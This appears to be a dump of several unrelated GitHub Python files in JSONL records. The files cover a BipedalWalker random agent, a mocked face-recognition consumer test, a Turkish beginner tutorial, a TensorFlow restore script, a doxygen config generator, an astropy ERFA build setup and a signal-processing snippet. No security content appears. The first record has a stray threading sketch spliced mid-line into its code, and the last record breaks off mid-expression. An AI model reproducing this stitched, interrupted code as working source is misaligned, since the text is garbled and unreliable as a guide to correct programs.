gym.make('BipedalWalkerHardcore-v3')\r\n env.seed(10)\r\n return env\r\n\r\n\r\n# 观察一个未经训练的随机智能体\r\ndef random_without_break(env):\r\n for _ in range(3000):\r\n env.reset()\r\n env.render()\r\n for t in range(1000):\r\n action = np.random.uniform(low=-1.0, high=1.0, 
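# The Scraper record above hands every thread one shared result list and joins them
# all; a self-contained sketch of that pattern. list.append is atomic in CPython,
# so no lock is needed for this particular case.
import threading

class Worker(threading.Thread):
    def __init__(self, value, result):
        super().__init__()
        self.value = value
        self.result = result

    def run(self):
        self.result.append(self.value * 2)

result = []
tasks = [Worker(v, result) for v in range(5)]
for task in tasks:
    task.start()
for task in tasks:
    task.join()
print(sorted(result))  # [0, 2, 4, 6, 8]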
size=4)\r\n next_state, reward, done, _ = env.step(action)\r\n env.close()\r\n\r\n\r\ndef random_with_break(env):\r\n env.reset()\r\n for _ in range(1000):\r\n env.render()\r\n action = np.random.uniform(low=-1.0, high=1.0, size=4)\r\n next_state, reward, done, _ = env.step(action)\r\n if done:\r\n break\r\n env.close()\r\n\r\n\r\nnormal_env=make_normal_env()\r\nhardcore_env=make_hardcore()\r\nrandom_with_break(hardcore_env)\r\n\r\n\r\n","repo_name":"Quantum-Cheese/reinforcement_learning_projects","sub_path":"BipedalWalker/envTest.py","file_name":"envTest.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"70758829289","text":"import json\nimport numpy as np\nfrom typing import Optional\nfrom facekeeper.core import FaceKeeper\nfrom facekeeper.consumer import Consumer\nfrom unittest.mock import MagicMock, create_autospec, Mock\nfrom pika.adapters.blocking_connection import BlockingChannel\n\n\ndef callback_input_output_helper(\n callback_input, callback_output: Optional[object], expected_body: str\n):\n assert isinstance(expected_body, str)\n \"\"\"\n Ensure when callback returns non empty Object callback_output then\n Consumer will publish to the output queue the callback_input\n dictionary merged with callback_output\n \"\"\"\n # Given\n queue_in = \"queue.in\"\n queue_out = \"queue.out\"\n\n # Setup mocks\n callback = MagicMock(return_value=callback_output)\n channel = create_autospec(BlockingChannel)\n channel.basic_publish = MagicMock()\n consumer = Consumer(\n create_autospec(FaceKeeper), channel, queue_in, queue_out, callback\n )\n\n # When\n method = Mock(delivery_tag=\"some-delivery-tag\")\n consumer.on_message(channel, method, None, json.dumps(callback_input))\n\n # Then\n channel.basic_publish.assert_called_once_with(\"\", queue_out, body=expected_body, mandatory=True)\n\n\ndef test_callback_success():\n input = {\"url\": \"https://example.com/john.jpg\"}\n person = \"john\"\n tags = []\n output = {\n \"embedding_id\": \"embedding_id\",\n \"digest\": \"digest\",\n \"recognizer\": \"recognizer\",\n \"embedding\": np.array([1, 2, 3]).tolist(),\n \"person\": person,\n \"tags\": tags,\n \"success\": True\n }\n body = json.dumps({**input, **output})\n callback_input_output_helper(input, output, body)\n\n\ndef test_callback_empty_result():\n \"\"\"\n Ensure when person is not found on the picture\n the app will push proper message to the queue\n \"\"\"\n # When the person is not found the FaceKeeper Core returns None\n input = {\"url\": \"https://google.com\"}\n output = {\"success\": False}\n body = json.dumps({\"url\": \"https://google.com\", \"success\": False})\n callback_input_output_helper(input, output, body)\n","repo_name":"dairlair/facekeeper","sub_path":"facekeeper/tests/test_consumer.py","file_name":"test_consumer.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20912273835","text":"\r\n# %% veriable (degisken)\r\n\r\nvar1 = 10 # integer = int\r\nvar2 = 15\r\n\r\ngun=\"pazartesi\" # string\r\n\r\nvar3 = 10.0 # double(float)\r\n\r\n# 5var = 10 # hata verir\r\n\r\nVar7 = 19 # standart convention of python'a gore buyuk harfle baslamasi uygun degil\r\n\r\n# %% string \r\n\r\ns = \"bugun gunlerden pazartesi\"\r\nvariable_type = type(s) # str = string\r\nprint(s) # s 'e atadığımız veriler okunur\r\n\r\nvar1 = \"ankara\"\r\nvar2 = \"ist\"\r\nvar3 = var1+var2 # ankaraist 
çıktısını alırız\r\n\r\nvar4 = \"100\"\r\nvar5 = \"200\"\r\nvar6 = var4+var5 #100200 çıktısını alırız, çünkü string değerlerdir.\r\n\r\nuzunluk = len(var6) #Çıktı olarak 6 değerini alırız\r\n\r\n# %% numbers\r\n\r\ninteger_deneme = -50 # int\r\n\r\nfloat_deneme = -30.7 # double = float = ondalikli sayi\r\n\r\n# %% tür dönüşümleri\r\n\r\nfloat1 = 10.6 \r\n# int(float1) = float bir sayısı int değerine çeviriyor.\r\n# round(float1) = onluk bir sayıyı int değere çevirme\r\n\r\nstr2 = \"1005\"\r\nint(str2) # string değeri integer a çevirir.\r\n\r\n# %% user defined functions\r\nvar1 = 20\r\nvar2 = 50\r\noutput = (((var1+var2)*50)/100.0)*var1/var2\r\n\r\n# fonksiyon parametresi = input\r\ndef benim_ilk_func(a,b):\r\n \r\n \"\"\"\r\n bu benim ilk denemem\r\n parametre: \r\n return: \r\n \"\"\"\r\n output = (((a+b)*50)/100.0)*a/b\r\n return output\r\n \r\nsonuc = benim_ilk_func(var1,var2)\r\nprint(sonuc)\r\n\r\n# %% default ve flexible functionları\r\n\r\n# default = Cemberin cevresini hesapla\r\ndef cember_cevresi_hesapla(r,pi=3.14): # input = r, output = cemberin cevresi\r\n output = 2*pi*r\r\n return output\r\n\r\n# flexible\r\ndef hesapla(boy,kilo,*args):\r\n print(args) # istediğiniz parametreyi girebilirsin\r\n output = (boy+kilo)*args[0]\r\n return output\r\n\r\n# %% lambda function\r\ndef hesapla(x):\r\n return x*x\r\nsonuc1 = hesapla(3)\r\n# sonuc1 ve sonuc2 de aynı işlevleri gerçekleştiriyoruz.\r\nsonuc2 = lambda x: x*x\r\nprint(sonuc2(3))\r\n\r\n# %% list\r\n\r\nliste = [1,2,3,4,5,6]\r\ntype(liste) # integer liste oluşumu\r\n\r\nliste_str = [\"ptesi\",\"sali\",\"cars\"]\r\ntype(liste_str) # string liste oluşumu\r\n\r\nvalue = liste[1]\r\nprint(value) # listenin 1. indexini yazdır\r\n\r\nlast_value = liste[-1] # listenin en sonundan başlayarak -1. 
değerini yazdır\r\n\r\nliste_divide = liste[0:3] # listenin 0 dan 3 e kadar olan değerlerini yazdır\r\n\r\nliste.append(7) # listenin sonuna 7 ekle\r\nliste.remove(7) # listeden 7 yi çıkar\r\nliste.reverse() # listeyi terseten yazdır\r\n\r\nliste2 = [1,5,4,3,6,7,2]\r\nliste2.sort() # listeyi küçükten büyüğe yazdırır\r\n\r\nstring_int_liste = [1,2,3,\"aa\",\"bb\"] # Karışık değişkenli liste oluşturma\r\n\r\n# %% tuple\r\n\r\nt = (1,2,3,3,4,5,6)\r\n\r\nt.count(3) # t'nin içinde kaç tane 3 var\r\nt.index(3) # 3'ün index sayısını bul\r\n\r\n# %% dictionary\r\n\r\ndef deneme():\r\n dictionary = {\"ali\":32,\"veli\":45,\"ayse\":13}\r\n return dictionary\r\n\r\ndic = deneme()\r\n\r\n# %% conditionals\r\n# if else statement\r\n\r\nvar1 = 10\r\nvar2 = 20\r\n\r\nif(var1 > var2):\r\n print(\"var1 buyuktur var2\")\r\nelif(var1 == var2):\r\n print(\"var and var2 esitler\")\r\nelse:\r\n print(\"var1 kucuktur var2\")\r\n\r\n# format ile yazdırma\r\nliste = [1,2,3,4,5]\r\nvalue = 3\r\nif value in liste:\r\n print(\"evet {} degeri listenin icinde\".format(value))\r\nelse:\r\n print(\"hayir\")\r\n\r\n\r\n# %% loops (donguler)\r\n\r\n# for loop\r\n\r\nfor each in range(1,11):\r\n print(each) # 1'den 10'a kadar yazdır\r\n \r\nfor each in \"ankara ist\":\r\n print(each) # tüm harfleri tek tek yazdır\r\n \r\nfor each in \"ankara ist\".split(): \r\n print(each) # split kelimeleri boşluklarına göre ayır\r\n \r\nliste = [1,4,5,6,8,3,3,4,67]\r\nsummation = sum(liste) # listenin içindeki değerleri topla \r\n\r\ncount = 0\r\nfor each in liste:\r\n count = count + each\r\n print(count) # for ile listenin içindeki değerleri topla\r\n \r\n# ------------------------------------------------------------------------------------------------- \r\n# while loop\r\n \r\ni = 0\r\nwhile(i <4):\r\n print(i)\r\n i = i + 1 # 0,1,2,3 değerilerini yazdırır\r\n\r\nsinir = len(liste) \r\neach = 0\r\ncount = 0\r\nwhile(each < sinir):\r\n count = count + liste[each]\r\n each = each + 1 \r\n\r\n \r\n# %% class\r\n \r\nclass Calisan:\r\n zam_orani = 1.8\r\n counter = 0\r\n def __init__(self,isim,soyisim,maas): # constructor\r\n self.isim = isim\r\n self.soyisim = soyisim\r\n self.maas = maas\r\n self.email = isim+soyisim+\"@asd.com\"\r\n \r\n Calisan.counter = Calisan.counter + 1\r\n \r\n def giveNameSurname(self):\r\n return self.isim +\" \" +self.soyisim # isim ve soyismi aynı anda veren metod\r\n \r\n def zam_yap(self):\r\n self.maas = self.maas + self.maas*self.zam_orani\r\n \r\n# class variable\r\ncalisan1 = Calisan(\"ali\", \"veli\",100) \r\nprint(\"ilk maas: \",calisan1.maas)\r\ncalisan1.zam_yap()\r\nprint(\"yeni maas: \",calisan1.maas)\r\n\r\ncalisan2 = Calisan(\"ayse\", \"hatice\",200) \r\ncalisan3 = Calisan(\"ayse\", \"yelda\",600) \r\ncalisan4 = Calisan(\"eren\", \"hilal\",500) \r\n\r\n\r\n# class example\r\nliste = [calisan1,calisan2,calisan3,calisan4]\r\nmaxi_maas = -1\r\nindex = -1\r\nfor each in liste:\r\n if(each.maas>maxi_maas):\r\n maxi_maas = each.maas\r\n index = each\r\n \r\nprint(maxi_maas)\r\nprint(index.giveNameSurname())\r\n\r\n","repo_name":"SedaNurPOLATER/Yapay_Zeka","sub_path":"sifirdan_python.py","file_name":"sifirdan_python.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9012528858","text":"import tensorflow as tf \n\n#Remove the previous zeights and bias\ntf.reset_default_graph()\n\nsave_file = './model.ckpt'\n\n#Two variables\nweights = tf.Variable(tf.truncated_normal([2,3]))\nbias = 
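# An English rendering of the Calisan (employee) class from the Turkish tutorial
# record above: same behavior, translated names. A sketch, not part of the original file.
class Employee:
    raise_rate = 1.8  # class variable shared by all instances
    counter = 0

    def __init__(self, first, last, salary):
        self.first = first
        self.last = last
        self.salary = salary
        self.email = first + last + "@asd.com"
        Employee.counter += 1

    def full_name(self):
        return self.first + " " + self.last

    def give_raise(self):
        self.salary += self.salary * self.raise_rate

employee = Employee("ali", "veli", 100)
employee.give_raise()
print(employee.full_name(), employee.salary)  # ali veli 280.0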
tf.Variable(tf.truncated_normal([3]))\n\n# Class used to save and/or restore Tensor variables\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n # Load the weights and bias\n saver.restore(sess, save_file)\n\n # Show the values of weights and bias\n print('Weights:')\n print(sess.run(weights))\n\n print('Bias')\n print(sess.run(bias))\n","repo_name":"EmileLIN/Deep_Learning_Fondation","sub_path":"Part2/Lesson_09_DeepLearning_in_TensorFlow/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"37607247729","text":"## @file\r\n#\r\n# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>\r\n#\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\nfrom __future__ import print_function\r\nfrom __future__ import absolute_import\r\nimport os\r\n\r\nfrom .message import *\r\n\r\nclass BaseDoxygeItem:\r\n def __init__(self, name, tag=''):\r\n self.mName = name\r\n self.mTag = tag\r\n self.mDescription = ''\r\n self.mText = []\r\n\r\n def AddDescription(self, desc):\r\n self.mDescription = '%s%s' % (self.mDescription, desc)\r\n\r\n def __str__(self):\r\n return '\\n'.join(self.mText)\r\n\r\n def Generate(self):\r\n \"\"\"This interface needs to be overridden\"\"\"\r\n\r\nclass Section(BaseDoxygeItem):\r\n def Generate(self):\r\n \"\"\"This interface needs to be overridden\"\"\"\r\n if len(self.mTag) != 0:\r\n self.mText.append(' \\section %s %s' % (self.mName, self.mTag))\r\n else:\r\n self.mText.append(' \\section %s' % self.mName)\r\n\r\n self.mText.append(self.mDescription)\r\n return self.mText\r\n\r\nclass Page(BaseDoxygeItem):\r\n def __init__(self, name, tag=None, isSort=True):\r\n BaseDoxygeItem.__init__(self, name, tag)\r\n self.mSubPages = []\r\n self.mIsMainPage = False\r\n self.mSections = []\r\n self.mIsSort = isSort\r\n\r\n def GetSubpageCount(self):\r\n return len(self.mSubPages)\r\n\r\n def AddPage(self, subpage):\r\n self.mSubPages.append(subpage)\r\n return subpage\r\n\r\n def AddPages(self, pageArray):\r\n if pageArray is None:\r\n return\r\n for page in pageArray:\r\n self.AddPage(page)\r\n\r\n def AddSection(self, section):\r\n self.mSections.append(section)\r\n self.mSections.sort(key=lambda x: x.mName.lower())\r\n\r\n def Generate(self):\r\n if self.mIsMainPage:\r\n self.mText.append('/** \\mainpage %s' % self.mName)\r\n self.mIsSort = False\r\n else:\r\n self.mText.append('/** \\page %s %s' % (self.mTag, self.mName))\r\n\r\n if len(self.mDescription) != 0:\r\n self.mText.append(self.mDescription)\r\n endIndex = len(self.mText)\r\n\r\n self.mSections.sort(key=lambda x: x.mName.lower())\r\n for sect in self.mSections:\r\n self.mText += sect.Generate()\r\n\r\n endIndex = len(self.mText)\r\n\r\n if len(self.mSubPages) != 0:\r\n self.mText.insert(endIndex, "<p> \\section content_index INDEX\")\r\n endIndex = len(self.mText)\r\n self.mText.insert(endIndex, '<ul>')\r\n endIndex += 1\r\n if self.mIsSort:\r\n self.mSubPages.sort(key=lambda x: x.mName.lower())\r\n for page in self.mSubPages:\r\n self.mText.insert(endIndex, '<li>\\subpage %s \\\"%s\\\" </li>' % (page.mTag, page.mName))\r\n endIndex += 1\r\n self.mText += page.Generate()\r\n self.mText.insert(endIndex, '</ul>')\r\n endIndex += 1\r\n self.mText.insert(endIndex, ' **/')\r\n return self.mText\r\n\r\nclass DoxygenFile(Page):\r\n def __init__(self, name, file):\r\n Page.__init__(self, name)\r\n self.mFilename = file\r\n self.mIsMainPage = True\r\n\r\n def 
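# The read script above restores from ./model.ckpt, which assumes a checkpoint was
# written first. A sketch of the matching save step, assuming the same
# TensorFlow 1.x API as the record:
import tensorflow as tf

tf.reset_default_graph()
weights = tf.Variable(tf.truncated_normal([2, 3]))
bias = tf.Variable(tf.truncated_normal([3]))

saver = tf.train.Saver()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    saver.save(sess, './model.ckpt')  # produces the files the read script restores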
GetFilename(self):\r\n return self.mFilename.replace('/', '\\\\')\r\n\r\n def Save(self):\r\n str = self.Generate()\r\n try:\r\n f = open(self.mFilename, 'w')\r\n f.write('\\n'.join(str))\r\n f.close()\r\n except IOError as e:\r\n ErrorMsg ('Fail to write file %s' % self.mFilename)\r\n return False\r\n\r\n return True\r\n\r\ndoxygenConfigTemplate = \"\"\"\r\nDOXYFILE_ENCODING = UTF-8\r\nPROJECT_NAME = %(ProjectName)s\r\nPROJECT_NUMBER = %(ProjectVersion)s\r\nOUTPUT_DIRECTORY = %(OutputDir)s\r\nCREATE_SUBDIRS = YES\r\nOUTPUT_LANGUAGE = English\r\nBRIEF_MEMBER_DESC = YES\r\nREPEAT_BRIEF = YES\r\nABBREVIATE_BRIEF = \"The $name class \" \\\\\r\n \"The $name widget \" \\\\\r\n \"The $name file \" \\\\\r\n is \\\\\r\n provides \\\\\r\n specifies \\\\\r\n contains \\\\\r\n represents \\\\\r\n a \\\\\r\n an \\\\\r\n the\r\nALWAYS_DETAILED_SEC = NO\r\nINLINE_INHERITED_MEMB = NO\r\nFULL_PATH_NAMES = YES\r\nSTRIP_FROM_PATH = %(StripPath)s\r\nSTRIP_FROM_INC_PATH =\r\nSHORT_NAMES = YES\r\nJAVADOC_AUTOBRIEF = NO\r\nQT_AUTOBRIEF = NO\r\nMULTILINE_CPP_IS_BRIEF = NO\r\nDETAILS_AT_TOP = YES\r\nINHERIT_DOCS = YES\r\nSEPARATE_MEMBER_PAGES = NO\r\nTAB_SIZE = 1\r\nALIASES =\r\nOPTIMIZE_OUTPUT_FOR_C = YES\r\nOPTIMIZE_OUTPUT_JAVA = NO\r\nBUILTIN_STL_SUPPORT = NO\r\nCPP_CLI_SUPPORT = NO\r\nSIP_SUPPORT = NO\r\nDISTRIBUTE_GROUP_DOC = YES\r\nSUBGROUPING = YES\r\nTYPEDEF_HIDES_STRUCT = NO\r\n\r\nEXTRACT_ALL = YES\r\nEXTRACT_PRIVATE = NO\r\nEXTRACT_STATIC = NO\r\nEXTRACT_LOCAL_CLASSES = NO\r\nEXTRACT_LOCAL_METHODS = NO\r\nEXTRACT_ANON_NSPACES = NO\r\nHIDE_UNDOC_MEMBERS = NO\r\nHIDE_UNDOC_CLASSES = NO\r\nHIDE_FRIEND_COMPOUNDS = NO\r\nHIDE_IN_BODY_DOCS = NO\r\nINTERNAL_DOCS = NO\r\nCASE_SENSE_NAMES = NO\r\nHIDE_SCOPE_NAMES = NO\r\nSHOW_INCLUDE_FILES = NO\r\nINLINE_INFO = YES\r\nSORT_MEMBER_DOCS = YES\r\nSORT_BRIEF_DOCS = NO\r\nSORT_BY_SCOPE_NAME = YES\r\nGENERATE_TODOLIST = YES\r\nGENERATE_TESTLIST = YES\r\nGENERATE_BUGLIST = YES\r\nGENERATE_DEPRECATEDLIST= YES\r\nENABLED_SECTIONS =\r\nMAX_INITIALIZER_LINES = 30\r\nSHOW_USED_FILES = NO\r\nSHOW_DIRECTORIES = NO\r\nFILE_VERSION_FILTER =\r\n\r\nQUIET = NO\r\nWARNINGS = YES\r\nWARN_IF_UNDOCUMENTED = YES\r\nWARN_IF_DOC_ERROR = YES\r\nWARN_NO_PARAMDOC = YES\r\nWARN_FORMAT = \"$file:$line: $text \"\r\nWARN_LOGFILE = %(WarningFile)s\r\n\r\nINPUT = %(FileList)s\r\nINPUT_ENCODING = UTF-8\r\nFILE_PATTERNS = %(Pattern)s\r\nRECURSIVE = NO\r\nEXCLUDE = *.svn\r\nEXCLUDE_SYMLINKS = NO\r\nEXCLUDE_PATTERNS = .svn\r\nEXCLUDE_SYMBOLS =\r\nEXAMPLE_PATH = %(ExamplePath)s\r\nEXAMPLE_PATTERNS = *\r\nEXAMPLE_RECURSIVE = NO\r\nIMAGE_PATH =\r\nINPUT_FILTER =\r\nFILTER_PATTERNS =\r\nFILTER_SOURCE_FILES = NO\r\n\r\nSOURCE_BROWSER = NO\r\nINLINE_SOURCES = NO\r\nSTRIP_CODE_COMMENTS = YES\r\nREFERENCED_BY_RELATION = YES\r\nREFERENCES_RELATION = YES\r\nREFERENCES_LINK_SOURCE = NO\r\nUSE_HTAGS = NO\r\nVERBATIM_HEADERS = NO\r\n\r\nALPHABETICAL_INDEX = NO\r\nCOLS_IN_ALPHA_INDEX = 5\r\nIGNORE_PREFIX =\r\n\r\nGENERATE_HTML = YES\r\nHTML_OUTPUT = html\r\nHTML_FILE_EXTENSION = .html\r\nHTML_HEADER =\r\nHTML_FOOTER =\r\nHTML_STYLESHEET =\r\nHTML_ALIGN_MEMBERS = YES\r\nGENERATE_HTMLHELP = %(WhetherGenerateHtmlHelp)s\r\nHTML_DYNAMIC_SECTIONS = NO\r\nCHM_FILE = index.chm\r\nHHC_LOCATION =\r\nGENERATE_CHI = NO\r\nBINARY_TOC = NO\r\nTOC_EXPAND = NO\r\nDISABLE_INDEX = NO\r\nENUM_VALUES_PER_LINE = 4\r\nGENERATE_TREEVIEW = %(WhetherGenerateTreeView)s\r\nTREEVIEW_WIDTH = 250\r\n\r\nGENERATE_LATEX = NO\r\nLATEX_OUTPUT = latex\r\nLATEX_CMD_NAME = latex\r\nMAKEINDEX_CMD_NAME = makeindex\r\nCOMPACT_LATEX = NO\r\nPAPER_TYPE 
= a4wide\r\nEXTRA_PACKAGES =\r\nLATEX_HEADER =\r\nPDF_HYPERLINKS = YES\r\nUSE_PDFLATEX = YES\r\nLATEX_BATCHMODE = NO\r\nLATEX_HIDE_INDICES = NO\r\n\r\nGENERATE_RTF = NO\r\nRTF_OUTPUT = rtf\r\nCOMPACT_RTF = NO\r\nRTF_HYPERLINKS = NO\r\nRTF_STYLESHEET_FILE =\r\nRTF_EXTENSIONS_FILE =\r\n\r\nGENERATE_MAN = NO\r\nMAN_OUTPUT = man\r\nMAN_EXTENSION = .3\r\nMAN_LINKS = NO\r\n\r\nGENERATE_XML = NO\r\nXML_OUTPUT = xml\r\nXML_SCHEMA =\r\nXML_DTD =\r\nXML_PROGRAMLISTING = YES\r\n\r\nGENERATE_AUTOGEN_DEF = NO\r\n\r\nGENERATE_PERLMOD = NO\r\nPERLMOD_LATEX = NO\r\nPERLMOD_PRETTY = YES\r\nPERLMOD_MAKEVAR_PREFIX =\r\n\r\nENABLE_PREPROCESSING = YES\r\nMACRO_EXPANSION = YES\r\nEXPAND_ONLY_PREDEF = YES\r\nSEARCH_INCLUDES = YES\r\nINCLUDE_PATH = %(IncludePath)s\r\nINCLUDE_FILE_PATTERNS = *.h\r\nPREDEFINED = %(PreDefined)s\r\nEXPAND_AS_DEFINED =\r\nSKIP_FUNCTION_MACROS = NO\r\n\r\nTAGFILES =\r\nGENERATE_TAGFILE =\r\nALLEXTERNALS = NO\r\nEXTERNAL_GROUPS = YES\r\nPERL_PATH = /usr/bin/perl\r\n\r\nCLASS_DIAGRAMS = NO\r\nMSCGEN_PATH =\r\nHIDE_UNDOC_RELATIONS = YES\r\nHAVE_DOT = NO\r\nCLASS_GRAPH = YES\r\nCOLLABORATION_GRAPH = YES\r\nGROUP_GRAPHS = YES\r\nUML_LOOK = NO\r\nTEMPLATE_RELATIONS = NO\r\nINCLUDE_GRAPH = YES\r\nINCLUDED_BY_GRAPH = YES\r\nCALL_GRAPH = NO\r\nCALLER_GRAPH = NO\r\nGRAPHICAL_HIERARCHY = YES\r\nDIRECTORY_GRAPH = YES\r\nDOT_IMAGE_FORMAT = png\r\nDOT_PATH =\r\nDOTFILE_DIRS =\r\nDOT_GRAPH_MAX_NODES = 50\r\nMAX_DOT_GRAPH_DEPTH = 1000\r\nDOT_TRANSPARENT = YES\r\nDOT_MULTI_TARGETS = NO\r\nGENERATE_LEGEND = YES\r\nDOT_CLEANUP = YES\r\n\r\nSEARCHENGINE = NO\r\n\r\n\"\"\"\r\nclass DoxygenConfigFile:\r\n def __init__(self):\r\n self.mProjectName = ''\r\n self.mOutputDir = ''\r\n self.mFileList = []\r\n self.mIncludeList = []\r\n self.mStripPath = ''\r\n self.mExamplePath = ''\r\n self.mPattern = ['*.c', '*.h',\r\n '*.asm', '*.s', '.nasm', '*.html', '*.dox']\r\n self.mMode = 'HTML'\r\n self.mWarningFile = ''\r\n self.mPreDefined = []\r\n self.mProjectVersion = 0.1\r\n\r\n def SetChmMode(self):\r\n self.mMode = 'CHM'\r\n\r\n def SetHtmlMode(self):\r\n self.mMode = 'HTML'\r\n\r\n def SetProjectName(self, str):\r\n self.mProjectName = str\r\n\r\n def SetProjectVersion(self, str):\r\n self.mProjectVersion = str\r\n\r\n def SetOutputDir(self, str):\r\n self.mOutputDir = str\r\n\r\n def SetStripPath(self, str):\r\n self.mStripPath = str\r\n\r\n def SetExamplePath(self, str):\r\n self.mExamplePath = str\r\n\r\n def SetWarningFilePath(self, str):\r\n self.mWarningFile = str.replace('\\\\', '/')\r\n\r\n def FileExists(self, path):\r\n if path is None:\r\n return False\r\n if len(path) == 0:\r\n return False\r\n\r\n for p in self.mFileList:\r\n if path.lower() == p.lower():\r\n return True\r\n\r\n return False\r\n\r\n def AddFile(self, path):\r\n if path is None:\r\n return\r\n\r\n if len(path) == 0:\r\n return\r\n path = path.replace('\\\\', '/')\r\n if not self.FileExists(path):\r\n self.mFileList.append(path)\r\n\r\n def AddIncludePath(self, path):\r\n path = path.replace('\\\\', '/')\r\n if path not in self.mIncludeList:\r\n self.mIncludeList.append(path)\r\n\r\n def AddPattern(self, pattern):\r\n self.mPattern.append(pattern)\r\n\r\n def AddPreDefined(self, macro):\r\n self.mPreDefined.append(macro)\r\n\r\n def Generate(self, path):\r\n files = ' \\\\\\n'.join(self.mFileList)\r\n includes = ' \\\\\\n'.join(self.mIncludeList)\r\n patterns = ' \\\\\\n'.join(self.mPattern)\r\n if self.mMode.lower() == 'html':\r\n sHtmlHelp = 'NO'\r\n sTreeView = 'YES'\r\n else:\r\n sHtmlHelp = 'YES'\r\n sTreeView = 'NO'\r\n\r\n 
text = doxygenConfigTemplate % {'ProjectName':self.mProjectName,\r\n 'OutputDir':self.mOutputDir,\r\n 'StripPath':self.mStripPath,\r\n 'ExamplePath':self.mExamplePath,\r\n 'FileList':files,\r\n 'Pattern':patterns,\r\n 'WhetherGenerateHtmlHelp':sHtmlHelp,\r\n 'WhetherGenerateTreeView':sTreeView,\r\n 'IncludePath':includes,\r\n 'WarningFile':self.mWarningFile,\r\n 'PreDefined':' '.join(self.mPreDefined),\r\n 'ProjectVersion':self.mProjectVersion}\r\n try:\r\n f = open(path, 'w')\r\n f.write(text)\r\n f.close()\r\n except IOError as e:\r\n ErrorMsg ('Fail to generate doxygen config file %s' % path)\r\n return False\r\n\r\n return True\r\n\r\n########################################################################\r\n# TEST CODE\r\n########################################################################\r\nif __name__== '__main__':\r\n df = DoxygenFile('Platform Document', 'm:\\tree')\r\n df.AddPage(Page('Module', 'module'))\r\n p = df.AddPage(Page('Library', 'library'))\r\n p.AddDescription(desc)\r\n p.AddPage(Page('PCD', 'pcds'))\r\n\r\n df.Generate()\r\n print(df)\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Scripts/PackageDocumentTools/plugins/EdkPlugins/basemodel/doxygen.py","file_name":"doxygen.py","file_ext":"py","file_size_in_byte":13400,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"4850464124","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport os\nimport glob\n\nfrom distutils.extension import Extension\n\nimport numpy\nfrom extension_helpers import import_file\n\nERFAPKGDIR = os.path.relpath(os.path.dirname(__file__))\n\nERFA_SRC = os.path.abspath(os.path.join(ERFAPKGDIR, '..', '..',\n 'cextern', 'erfa'))\n\nSRC_FILES = glob.glob(os.path.join(ERFA_SRC, '*'))\nSRC_FILES += [os.path.join(ERFAPKGDIR, filename)\n for filename in ['pav2pv.c', 'pv2pav.c', 'erfa_additions.h',\n 'ufunc.c.templ', 'core.py.templ',\n 'erfa_generator.py']]\n\nGEN_FILES = [os.path.join(ERFAPKGDIR, 'core.py'),\n os.path.join(ERFAPKGDIR, 'ufunc.c')]\n\n\ndef get_extensions():\n\n gen = import_file(os.path.join(ERFAPKGDIR, 'erfa_generator.py'))\n gen.main(verbose=False)\n\n sources = [os.path.join(ERFAPKGDIR, fn)\n for fn in (\"ufunc.c\", \"pav2pv.c\", \"pv2pav.c\")]\n\n include_dirs = [numpy.get_include()]\n\n libraries = []\n\n if (int(os.environ.get('ASTROPY_USE_SYSTEM_ERFA', 0)) or\n int(os.environ.get('ASTROPY_USE_SYSTEM_ALL', 0))):\n libraries.append('erfa')\n else:\n # get all of the .c files in the cextern/erfa directory\n erfafns = os.listdir(ERFA_SRC)\n sources.extend(['cextern/erfa/' + fn\n for fn in erfafns if fn.endswith('.c')])\n\n include_dirs.append('cextern/erfa')\n\n erfa_ext = Extension(\n name=\"astropy._erfa.ufunc\",\n sources=sources,\n include_dirs=include_dirs,\n libraries=libraries,\n language=\"c\",)\n\n return [erfa_ext]\n","repo_name":"pyaetherometry/laughing-octo-tribble","sub_path":"pyaetherometry/extern/astropy/astropy/_erfa/setup_package.py","file_name":"setup_package.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36688365212","text":"import numpy as np\nfrom scipy import signal\nfrom scipy.signal import lfilter\nimport matplotlib.pyplot as plt\n\na1 = 0.4\na2 = 0.95\na3 = (-0.95)\n\nn = np.linspace(0,50,51)\nl = np.linspace(-50,50,101)\nf = np.linspace(-0.5,0.5,101)\n\n#We get diffrent x values\nx1 = a1**n\nx2 = a2**n\nx3 = a3**n\n#We now need to get 
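# DoxygenConfigFile above renders one big %-style template from a dict; the same idea
# with string.Template from the standard library. The file and key names here are
# illustrative only.
from string import Template

CONFIG_TEMPLATE = Template("""\
PROJECT_NAME = $project
OUTPUT_DIRECTORY = $out_dir
INPUT = $files
""")

def write_config(path, project, out_dir, files):
    text = CONFIG_TEMPLATE.substitute(project=project, out_dir=out_dir,
                                      files=' \\\n'.join(files))
    with open(path, 'w') as f:
        f.write(text)

write_config('demo.cfg', 'Demo', './out', ['a.c', 'b.c'])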
